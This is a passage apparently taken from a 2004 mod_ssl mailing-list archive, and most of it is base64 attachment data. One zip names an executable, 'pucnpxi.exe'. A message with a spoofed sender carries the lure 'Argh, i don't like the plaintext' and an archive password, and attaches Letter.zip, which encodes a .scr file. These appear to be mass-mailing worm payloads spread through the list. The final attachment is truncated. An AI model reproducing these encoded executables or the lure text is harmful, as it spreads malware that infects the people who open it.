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
AAAA

----------cxxhnqoumpgxpincwttn--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  2 09:33:50 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CC1ACA8A6B; Tue,  2 Mar 2004 09:33:50 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from auemail2.firewall.lucent.com (auemail2.lucent.com [192.11.223.163])
	by master.modssl.org (Postfix) with ESMTP id E05B4A8A6F
	for ; Tue,  2 Mar 2004 09:33:45 +0100 (CET)
Received: from cinjjtu (h135-252-58-142.lucent.com [135.252.58.142])
	by auemail2.firewall.lucent.com (Switch-2.2.8/Switch-2.2.8) with SMTP id i228Xe327008
	for ; Tue, 2 Mar 2004 02:33:40 -0600 (CST)
Date: Tue, 02 Mar 2004 16:33:25 +0800
To: modssl-users@modssl.org
Subject: ^_^ meay-meay!
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------dnytkgciojteiwywbjyl"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------dnytkgciojteiwywbjyl
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

 Argh, i  don't like  the  plaintext  :)

password for  archive:  52170

----------dnytkgciojteiwywbjyl
Content-Type: application/octet-stream; name="Letter.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Letter.zip"

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
